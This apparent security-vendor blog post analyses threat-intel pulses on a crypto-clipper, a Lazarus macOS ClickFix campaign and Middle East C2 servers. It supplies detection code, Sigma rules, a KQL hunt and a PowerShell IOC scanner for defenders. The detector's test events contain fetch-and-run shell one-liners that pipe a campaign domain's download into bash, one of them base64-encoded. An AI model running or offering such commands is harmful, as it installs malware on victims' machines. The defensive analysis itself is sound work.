
TwizAdmin Crypto-Clipper, Lazarus Mach-O Man & Middle East C2 Infrastructure: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 26, 2026
9 min read

These OTX pulses describe three concurrent threats to enterprise financial and energy sectors. The Lazarus Group is deploying "Mach-O Man" macOS malware through ClickFix social-engineering attacks; DataBreachPlus runs a multi-stage crypto-clipper operation against both Windows and macOS; and nation-state actors including APT28 and ENERGETIC BEAR have built out C2 infrastructure across the Middle East, with Saudi Arabia's STC hosting 72.4% of the regional malicious servers observed. The common threads are credential theft, cryptocurrency hijacking and persistent surveillance infrastructure, delivered through legitimate-looking lures such as fake FedEx notifications and fraudulent meeting invitations.

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin & crpx0)

This Russian-speaking operation targets cryptocurrency assets on both Windows and macOS. Distribution appears to rely on FedEx-themed phishing emails or messages. The malware is staged: the first stage hijacks the clipboard, replacing wallet addresses for eight blockchain networks with attacker-controlled ones; later stages steal BIP-39 seed phrases and exfiltrate browser credentials; the chain culminates in ransomware deployment (crpx0). Persistence and remote control come from a Java RAT builder paired with a FastAPI-based C2 panel that requires license key authentication. Domain rotation and file hash variation limit the shelf life of static IOCs, so behavioural detection (clipboard substitution, access to browser credential stores) has to carry coverage alongside the hashes.
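To make the clipper's first stage concrete, here is an added example (not code from the pulse or from the DataBreachPlus tooling) that classifies clipboard contents by wallet-address format and flags the tell-tale substitution: the user copies one address and a different address for the same chain is what gets pasted. The chain list and patterns are assumptions for illustration, since the page does not name the eight networks, and the checks are format-only (prefix and alphabet), not checksum validation. The clipboard events are constructed; the Bitcoin address is a publicly documented example address and the Ethereum ones are synthetic hex.

```python
import re

# Address-format patterns (prefix and alphabet only; no checksum validation).
# The page does not name the eight chains the clipper targets, so this set is an
# assumption covering the networks clippers most often swap.
ADDRESS_PATTERNS = {
    "BTC":  re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})$"),
    "ETH":  re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "LTC":  re.compile(r"^(?:[LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[a-z0-9]{39,59})$"),
    "XMR":  re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
    "TRX":  re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$"),
    "XRP":  re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$"),
    "DOGE": re.compile(r"^D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}$"),
    "BCH":  re.compile(r"^(?:bitcoincash:)?[qp][a-z0-9]{41}$"),
}


def classify(text):
    """Return the chain whose address format `text` matches, or None."""
    candidate = text.strip()
    for chain, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return chain
    return None


def detect_swap(copied, pasted):
    """Compare the last copied text with what was pasted.

    A clipper replaces a wallet address with the attacker's address for the
    same chain, so "same chain, different address" is the strongest signal.
    """
    if copied == pasted:
        return None
    src, dst = classify(copied), classify(pasted)
    if src is None or dst is None:
        return None                      # nothing wallet-shaped on both sides
    kind = "same_chain_swap" if src == dst else "cross_chain_swap"
    return {"chain": src, "kind": kind, "copied": copied, "pasted": pasted}


def audit_clipboard_events(events):
    """Pair every paste with the most recent copy and collect swap alerts.

    `events` is an iterable of (timestamp, "copy"|"paste", text) tuples, the
    shape a clipboard-monitoring agent would log.
    """
    alerts, last_copy = [], None
    for ts, action, content in events:
        if action == "copy":
            last_copy = content
        elif action == "paste" and last_copy is not None:
            hit = detect_swap(last_copy, content)
            if hit:
                hit["time"] = ts
                alerts.append(hit)
    return alerts


# Constructed clipboard log. The Bitcoin address is a publicly documented
# example address; the Ethereum ones are synthetic hex strings.
CLIPBOARD_EVENTS = [
    ("10:00:01", "copy",  "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    ("10:00:03", "paste", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),   # unchanged: benign
    ("10:02:10", "copy",  "0x" + "ab" * 20),
    ("10:02:12", "paste", "0x" + "cd" * 20),                      # same chain, new address: clipper
    ("10:05:00", "copy",  "meeting notes for Friday"),
    ("10:05:02", "paste", "meeting notes for Friday"),             # not a wallet address: ignored
]

if __name__ == "__main__":
    for alert in audit_clipboard_events(CLIPBOARD_EVENTS):
        print(f"{alert['time']} {alert['kind']} on {alert['chain']}: "
              f"{alert['copied']} -> {alert['pasted']}")
```

Pairing each paste only with the most recent copy matters: a user who copies address A, then address B, then pastes B has not been clipped, and comparing against anything older than the last copy would raise a false alert on that everyday sequence.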

Lazarus Group (Mach-O Man & PyLangGhostRAT)

The DPRK-linked actor continues to target finance and technology organisations through social engineering. Its current macOS tooling, "Mach-O Man", is a purpose-built malware kit distributed through Telegram-driven ClickFix attacks that impersonate collaboration platforms (Zoom, Teams, Google Meet). The chain starts with a fraudulent meeting invitation, leads to a fake collaboration site, and ends with the victim pasting a terminal command that downloads and runs the malware; the human step is the defining feature, since no exploit is involved and the download is a user-initiated shell command. The malware harvests browser credentials and exfiltrates them over Telegram channels. PyLangGhostRAT provides remote access, likely enabling lateral movement within the victim environment.
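The terminal step is where a ClickFix chain is most visible on the endpoint. As an added example (not from the pulse, the ANY.RUN write-up or the Mach-O Man kit), the Python below scores macOS process-creation events on several signals: a download utility, downloaded content fed straight to a shell, base64 decoding, a spawn from Terminal, and the pulse's livemicrosft.com domain. Tokens that look like base64 are decoded and scored as well, because a pasted one-liner often hides the real command that way. The signal weights, the threshold and the events are constructed assumptions; the Homebrew install one-liner is included because it is the classic legitimate curl-to-shell pattern that a domain-agnostic rule would flag.

```python
import base64
import binascii
import re

# Domain from the pulse; extend with the rest of the pulse's indicator list.
KNOWN_DOMAINS = ("livemicrosft.com",)

# (name, pattern, weight): the weights are assumptions chosen so that a bare
# curl-pipe-bash stays below the alert threshold while campaign-specific
# signals push an event over it.
SIGNALS = [
    ("downloader",      re.compile(r"\b(?:curl|wget)\b"), 1),
    ("runs_downloaded", re.compile(r"\|\s*(?:ba|z)?sh\b|\$\(\s*(?:curl|wget)\b"), 2),
    ("base64_decode",   re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"), 2),
]
KNOWN_DOMAIN_WEIGHT = 4
TERMINAL_PARENT_WEIGHT = 1
ALERT_THRESHOLD = 5

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_embedded_base64(cmd):
    """Decode base64-looking tokens so that a command hidden behind
    'echo <blob> | base64 -D | sh' is scored on its real content."""
    decoded = []
    for token in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue                                   # not valid base64 (e.g. a URL path)
        if raw and all(32 <= b < 127 for b in raw):    # keep only printable ASCII payloads
            decoded.append(raw.decode("ascii"))
    return decoded


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    cmd = event["command_line"]
    texts = [cmd] + decode_embedded_base64(cmd)
    score, reasons = 0, []
    for name, pattern, weight in SIGNALS:
        if any(pattern.search(t) for t in texts):
            score += weight
            reasons.append(name)
    if any(d in t.lower() for t in texts for d in KNOWN_DOMAINS):
        score += KNOWN_DOMAIN_WEIGHT
        reasons.append("known_clickfix_domain")
    # ClickFix victims paste into Terminal; installers launched by an app or MDM have other parents
    if event.get("parent_image", "").endswith("/Terminal"):
        score += TERMINAL_PARENT_WEIGHT
        reasons.append("spawned_from_terminal")
    return score, reasons


def hunt(events, threshold=ALERT_THRESHOLD):
    """Return the events whose score reaches the threshold, in input order."""
    return [e for e in events if score_event(e)[0] >= threshold]


TERMINAL = "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"
# Constructed events; the livemicrosft.com URL path is a placeholder, and the
# base64 blob decodes to "curl -s https://livemicrosft.com/".
EVENTS = [
    {"parent_image": TERMINAL, "image": "/bin/zsh",
     "command_line": "zsh -c 'curl -fsSL https://livemicrosft.com/fix | bash'"},
    {"parent_image": TERMINAL, "image": "/bin/sh",
     "command_line": "sh -c 'echo Y3VybCAtcyBodHRwczovL2xpdmVtaWNyb3NmdC5jb20v | base64 -D | sh'"},
    {"parent_image": TERMINAL, "image": "/bin/bash",   # Homebrew's install one-liner: legitimate
     "command_line": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'},
]

if __name__ == "__main__":
    for e in EVENTS:
        score, reasons = score_event(e)
        flag = "ALERT" if score >= ALERT_THRESHOLD else "ok   "
        print(f"{flag} score={score:<2} {e['image']:<10} {', '.join(reasons)}")
```

The first two events score 8 and 10 and are flagged; the Homebrew line scores 4 and is not, which is the false positive the Sigma rule further down lists under "Legitimate software installation". In production the domain list would be the full pulse feed and trusted download hosts would be allowlisted explicitly rather than relying on the threshold alone.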

Middle East Infrastructure Campaign

The pulse aggregates 1,350+ C2 servers hosted on Middle Eastern telecommunications and hosting providers and attributed to actors including Eagle Werewolf, ENERGETIC BEAR, Velvet Tempest, APT28 and GrayCharlie; a shared hosting footprint does not by itself mean these groups cooperate. The servers support malware families including Phorpiex, XMRig, LockBit Black, EchoGather, Sliver, SoullessRAT and Cobalt Strike. The concentration of 72.4% of this infrastructure on Saudi Arabia's STC network points to compromised customer hosts or accounts, or to exploitation of an infrastructure vulnerability; the pulse references CVE-2025-11953 in this context without describing how it is used. Hosting across 14 countries gives regional operators low latency to their targets and C2 traffic that blends into local provider ranges, lowering the chance of detection.

IOC Analysis

The pulse data presents a diverse set of indicators requiring different detection approaches:

Domain and URL Indicators (fanonlyatn.xyz, livemicrosft.com): These domains serve as distribution points for malware payloads. Block them at the DNS layer (RPZ or resolver policy) and in web proxies, matching subdomains as well as the apex, and push the same list to endpoint DNS resolvers. Certificate transparency logs and passive DNS can reveal related infrastructure registered by the same operator.

File Hashes (23 unique SHA256 hashes): These represent executable payloads for both Windows and macOS. Configure endpoint detection to quarantine matching files immediately. Pivoting on the hashes in a sandbox or malware repository can surface code-signing certificates and compile timestamps that correlate with other campaigns; the hash value itself carries no such metadata. Because the operation rotates file hashes, treat a hash match as confirmation rather than as the primary detection.

IPv4 Addresses (6 indicators): These C2 servers sit in dispersed Middle Eastern provider ranges. Block them at the perimeter and alert on any match, paying particular attention to outbound connections from servers holding sensitive data and from privileged sessions, where there is rarely a legitimate reason to reach these addresses.

CVE Reference (CVE-2025-11953): The pulse gives no details, but this is probably the vulnerability behind the infrastructure compromise. Confirm the affected product in NVD or the vendor advisory before acting, update vulnerability scanners with a check for it, and prioritise any exposed instances for patching or isolation.

Operationalization is tiered: network perimeter blocking (firewalls, proxies, DNS), endpoint protection (EDR hash and behaviour signatures), and SIEM correlation (connections to the listed IPs and domains, execution of files with the listed hashes). Given the hash rotation noted above, the behavioural rules in the Detection Engineering section carry the long-term coverage; the static indicators are for immediate containment.
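The tiering described above comes down to a small normalisation step. The following Python is an added example, not tooling from the pulse: it refangs indicators in the forms analysts receive them ([.] and hxxp), classifies each one as SHA-256, CVE, IP or domain, rejects anything unparseable or non-routable so that an internal address can never land in a blocklist, and emits an RPZ fragment for the DNS tier. The sample feed mixes the pulse's own indicators with a constructed internal address and a junk entry to exercise the rejection path.

```python
import ipaddress
import re

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def refang(value):
    """Undo the common defanging conventions ([.], (.), hxxp) used in reports."""
    v = value.strip()
    for old, new in (("[.]", "."), ("(.)", "."), ("[:]", ":")):
        v = v.replace(old, new)
    return re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)


def classify_ioc(value):
    """Return (kind, normalised_value); kind is one of sha256, cve, ipv4, ipv6,
    ip_non_global, domain or unknown."""
    v = refang(value)
    low = v.lower()
    if SHA256_RE.match(low):
        return "sha256", low
    if CVE_RE.match(v.upper()):
        return "cve", v.upper()
    try:
        addr = ipaddress.ip_address(v)
    except ValueError:
        pass
    else:
        # RFC 1918, loopback, link-local etc. must never reach a blocklist: a
        # typo in a feed would otherwise cut off internal traffic.
        if not addr.is_global:
            return "ip_non_global", str(addr)
        return f"ipv{addr.version}", str(addr)
    if DOMAIN_RE.match(low):
        return "domain", low
    return "unknown", v


def build_blocklists(iocs):
    """Sort indicators into the tiers they are deployed to."""
    tiers = {"dns": set(), "firewall": set(), "edr_hashes": set(), "vuln_scan": set()}
    rejected = []
    for raw in iocs:
        kind, norm = classify_ioc(raw)
        if kind == "domain":
            tiers["dns"].add(norm)
        elif kind in ("ipv4", "ipv6"):
            tiers["firewall"].add(norm)
        elif kind == "sha256":
            tiers["edr_hashes"].add(norm)
        elif kind == "cve":
            tiers["vuln_scan"].add(norm)
        else:
            rejected.append((raw, kind))
    out = {name: sorted(values) for name, values in tiers.items()}
    out["rejected"] = rejected
    return out


def render_rpz(domains):
    """Response Policy Zone records: NXDOMAIN for each domain and all its subdomains."""
    lines = []
    for d in domains:
        lines.append(f"{d} CNAME .")
        lines.append(f"*.{d} CNAME .")
    return "\n".join(lines) + "\n"


# Constructed feed: the pulse's indicators in the defanged / mixed-case forms
# they often arrive in, plus an internal address and a junk line to exercise
# the rejection path.
SAMPLE_IOCS = [
    "fanonlyatn[.]xyz",
    "livemicrosft.com",
    "103.241.66.238",
    "37.32.15.8",
    "192.168.1.10",
    "06299676B43749B8477C4BC977C09512957FC9B66FD5030C1874069632CE6092",
    "cve-2025-11953",
    "not an indicator!",
]

if __name__ == "__main__":
    tiers = build_blocklists(SAMPLE_IOCS)
    for name in ("dns", "firewall", "edr_hashes", "vuln_scan", "rejected"):
        print(f"{name}: {tiers[name]}")
    print(render_rpz(tiers["dns"]))
```

Rejected entries are returned rather than dropped so the analyst sees what the feed contained but the blocklists did not take; the wildcard RPZ record is what makes the "match subdomains as well as the apex" point from the domain paragraph hold at the resolver.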

Detection Engineering

YAML
---
title: Potential Mach-O Man Malware Installation via Terminal
id: 9fe6a2c1-fd34-5678-9a1b-cdef12345678
description: Detects a download utility invoked from a shell together with a domain from the Mach-O Man ClickFix campaign, the pattern produced when a victim pastes the ClickFix command into Terminal
status: experimental
author: Security Arsenal
date: 2026-05-27
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1059.004
    - attack.initial_access
    - attack.t1566.001
logsource:
    product: macos
    category: process_creation
detection:
    selection_shell:
        # macOS Terminal runs zsh by default, so a bash-only match misses most pasted ClickFix commands
        Image|endswith:
            - '/bin/bash'
            - '/bin/zsh'
            - '/bin/sh'
    # The original rule listed CommandLine|contains twice inside one selection. That is a duplicate
    # YAML key (the second silently replaces the first), so the tool and domain lists are now
    # separate selections combined in the condition.
    selection_tool:
        CommandLine|contains:
            - 'curl'
            - 'wget'
    selection_domain:
        # livemicrosft.com is from the pulse; the other two entries are placeholders to replace with the full pulse domain list
        CommandLine|contains:
            - 'livemicrosft.com'
            - 'fakezoom.com'
            - 'falsesite.com'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation
level: high
---
title: TwizAdmin C2 Network Communication
id: 8fe6a2c1-fd34-5678-9a1b-cdef12345679
description: Detects network connections to known TwizAdmin C2 infrastructure by destination hostname or destination IP
status: experimental
author: Security Arsenal
date: 2026-05-27
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: windows
    category: network_connection
detection:
    selection_domain:
        DestinationHostname|endswith: 'fanonlyatn.xyz'
    selection_ip:
        # An IP fragment does not belong in the hostname field; match the C2 range on DestinationIp instead
        DestinationIp|startswith: '103.241.66.'
    # The original rule also required DestinationPort 1337. The port is not a stable indicator and
    # ANDing it with the IOC match would miss C2 on any other port, so it is left out.
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
---
title: Suspicious Clipboard Access Pattern
id: 7fe6a2c1-fd34-5678-9a1b-cdef1234567a
description: Detects script-driven clipboard reads and writes consistent with crypto-clipping. Compiled clippers usually call the Win32 clipboard APIs directly and leave nothing on the command line, so this covers script-based and living-off-the-land variants only.
status: experimental
author: Security Arsenal
date: 2026-05-27
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.collection
    - attack.t1115
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Get-Clipboard'
            - 'clipboard.GetText'
            - 'Set-Clipboard'
            - 'clipboard.setText'
    filter_file_to_clipboard:
        # A plain substring 'type' also matches '-Type' in unrelated parameters; anchor the command words instead
        CommandLine|re: '(?i)(^|[\s;|(])(type|cat|Get-Content)\s'
    condition: selection and not filter_file_to_clipboard
falsepositives:
    - Administrative scripts
    - Legitimate clipboard management tools
level: medium


kql
// Hunt for connections to the pulse's C2 indicators in Microsoft Defender for Endpoint data
let MaliciousIPs = dynamic([
    "37.32.15.8", "197.51.170.131", "5.109.182.231",
    "93.113.62.247", "94.252.245.193", "103.241.66.238"
]);
let MaliciousDomains = dynamic(["fanonlyatn.xyz", "livemicrosft.com"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
// has_any on RemoteUrl also catches subdomains and full URLs that embed the domain
| where RemoteIP in (MaliciousIPs) or RemoteUrl has_any (MaliciousDomains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName,
          InitiatingProcessCommandLine, RemoteIP, RemoteUrl, RemotePort, ActionType
| order by Timestamp desc


powershell
# TwizAdmin & Mach-O Man IOC Hunter
# Version: 1.0
# Author: Security Arsenal

# Known Malicious Hashes
$maliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
    "85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
    "871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
    "89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
    "a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614"
)

# Known Malicious Domains
$maliciousDomains = @(
    "fanonlyatn.xyz",
    "livemicrosft.com"
)

# Known Malicious IPs
$maliciousIPs = @(
    "37.32.15.8", 
    "197.51.170.131", 
    "5.109.182.231", 
    "93.113.62.247", 
    "94.252.245.193",
    "103.241.66.238"
)

# Function to calculate file hash (wraps Get-FileHash; lowercased so it compares against the IOC list)
function Get-FileHashCustom {
    param([string]$Path)

    if (Test-Path -LiteralPath $Path) {
        $result = Get-FileHash -LiteralPath $Path -Algorithm SHA256 -ErrorAction SilentlyContinue
        if ($result) { return $result.Hash.ToLower() }
    }
    return $null
}

# Function to check for suspicious network connections
function Test-SuspiciousConnections {
    Write-Host "`n[+] Checking for suspicious network connections..."
    
    $connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | 
                   Where-Object { $maliciousIPs -contains $_.RemoteAddress }
    
    if ($connections) {
        Write-Host "[!] ALERT: Found connections to malicious IPs:" -ForegroundColor Red
        foreach ($conn in $connections) {
            $process = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
            Write-Host "   Remote IP: $($conn.RemoteAddress) | Local Port: $($conn.LocalPort) | Process: $($process.ProcessName) (PID: $($conn.OwningProcess))" -ForegroundColor Yellow
        }
    } else {
        Write-Host "[*] No suspicious network connections found." -ForegroundColor Green
    }
}

# Function to scan common directories for malware
function Search-MaliciousFiles {
    param([string[]]$Paths)
    
    Write-Host "`n[+] Scanning directories for malicious files..."
    
    $foundMalware = $false
    
    foreach ($path in $Paths) {
        if (Test-Path $path) {
            Write-Host "[*] Scanning $path..."
            
            $files = Get-ChildItem -Path $path -Recurse -File -ErrorAction SilentlyContinue | 
                     Where-Object { $_.Length -gt 0 -and $_.Length -lt 50MB }
            
            foreach ($file in $files) {
                $hash = Get-FileHashCustom -Path $file.FullName
                
                if ($hash -in $maliciousHashes) {
                    Write-Host "[!] ALERT: Found malicious file: $($file.FullName)" -ForegroundColor Red
                    Write-Host "    Hash: $hash" -ForegroundColor Yellow
                    $foundMalware = $true
                }
            }
        }
    }
    
    if (-not $foundMalware) {
        Write-Host "[*] No malicious files found in common directories." -ForegroundColor Green
    }
}

# Function to check for non-browser processes touching browser profile directories
function Test-BrowserAccess {
    Write-Host "`n[+] Checking for suspicious browser data access..."

    # Get-Process exposes ProcessName without the .exe suffix, so the list must not carry it
    $browsers = @("chrome", "msedge", "firefox", "brave")

    $processes = Get-Process | Where-Object { $_.ProcessName -in $browsers }

    if ($processes) {
        Write-Host "[*] Browser processes running:"
        foreach ($proc in $processes) {
            Write-Host "    - $($proc.ProcessName) (PID: $($proc.Id))" -ForegroundColor Cyan
        }
    } else {
        Write-Host "[*] No browsers currently running." -ForegroundColor Green
    }

    # A process's loaded modules say nothing about which files it has open, so instead look for
    # non-browser processes whose command line references a browser profile directory. This is a
    # partial signal: a stealer that opens the credential stores through file APIs leaves no trace here.
    $browserDataPaths = @(
        "$env:LOCALAPPDATA\Google\Chrome\User Data",
        "$env:LOCALAPPDATA\Microsoft\Edge\User Data",
        "$env:APPDATA\Mozilla\Firefox\Profiles"
    )

    $suspects = Get-CimInstance Win32_Process -ErrorAction SilentlyContinue | Where-Object {
        $cmd = $_.CommandLine
        $exe = [System.IO.Path]::GetFileNameWithoutExtension($_.Name)
        $cmd -and ($browsers -notcontains $exe) -and
        ($browserDataPaths | Where-Object { $cmd -like "*$_*" })
    }

    if ($suspects) {
        Write-Host "[!] Non-browser processes referencing browser profile directories:" -ForegroundColor Yellow
        foreach ($s in $suspects) {
            Write-Host "    - $($s.Name) (PID: $($s.ProcessId)): $($s.CommandLine)" -ForegroundColor Cyan
        }
    } else {
        Write-Host "[*] No non-browser processes referencing browser profile directories." -ForegroundColor Green
    }
}

# Function to check DNS cache for malicious domains
function Test-DNSCache {
    Write-Host "`n[+] Checking DNS cache for malicious domains..."

    $dnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue

    if ($dnsCache) {
        # Match the apex and any subdomain; an exact -contains comparison misses e.g. www.fanonlyatn.xyz
        $badEntries = $dnsCache | Where-Object {
            $name = $_.Entry
            $maliciousDomains | Where-Object { $name -eq $_ -or $name -like "*.$_" }
        }

        if ($badEntries) {
            Write-Host "[!] ALERT: Found entries for malicious domains in DNS cache:" -ForegroundColor Red
            foreach ($entry in $badEntries) {
                Write-Host "    - $($entry.Entry) -> $($entry.Data)" -ForegroundColor Yellow
            }
        } else {
            Write-Host "[*] No malicious domains found in DNS cache." -ForegroundColor Green
        }
    } else {
        Write-Host "[*] Unable to retrieve DNS cache (empty, or the DnsClient module is unavailable)." -ForegroundColor Yellow
    }
}

# Main execution
Write-Host "TwizAdmin & Mach-O Man IOC Hunter" -ForegroundColor Cyan
Write-Host "================================" -ForegroundColor Cyan

# Check for administrator privileges
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Host "[!] WARNING: This script should be run as Administrator for complete functionality." -ForegroundColor Yellow
}

# Perform checks
Test-SuspiciousConnections
Search-MaliciousFiles -Paths @("$env:TEMP", "$env:APPDATA", "$env:LOCALAPPDATA", "$env:USERPROFILE\Downloads")
Test-BrowserAccess
Test-DNSCache

Write-Host "`n[*] Hunt complete. Review any alerts above and investigate suspicious findings." -ForegroundColor Cyan

Response Priorities

Immediate

  • Block all identified IOCs (IPs, domains, URLs) at network perimeter (firewalls, proxies, DNS filtering)
  • Deploy file hash signatures to all endpoint protection platforms
  • Initiate hunt for matching file hashes across endpoints using EDR capabilities
  • Isolate any systems with confirmed connections to C2 infrastructure
  • Update web filtering to block access to identified malicious domains

24h

  • Implement mandatory password resets for all privileged accounts due to credential theft capabilities of identified malware
  • Enable multi-factor authentication across all sensitive applications
  • Conduct memory forensics on potentially compromised endpoints to detect credential dumping tools
  • Review browser saved credentials across enterprise systems for potential compromise
  • Validate integrity of cryptocurrency wallets and blockchain-related applications

1 week

  • Implement application allowlisting to prevent execution of unsigned binaries
  • Deploy advanced email filtering for FedEx-themed and meeting invitation phishing campaigns
  • Conduct targeted security awareness training focused on social engineering and ClickFix attacks
  • Review and restrict PowerShell across the enterprise: execution policy is not a security boundary (it is bypassed with -ExecutionPolicy Bypass), so pair it with Constrained Language Mode or AppLocker/WDAC script enforcement, and enable script block logging so clipboard and credential-theft commands appear in Event ID 4104
  • Implement network segmentation to limit lateral movement capabilities
  • Deploy deception technology (honeypots, honeytokens) to detect credential theft attempts
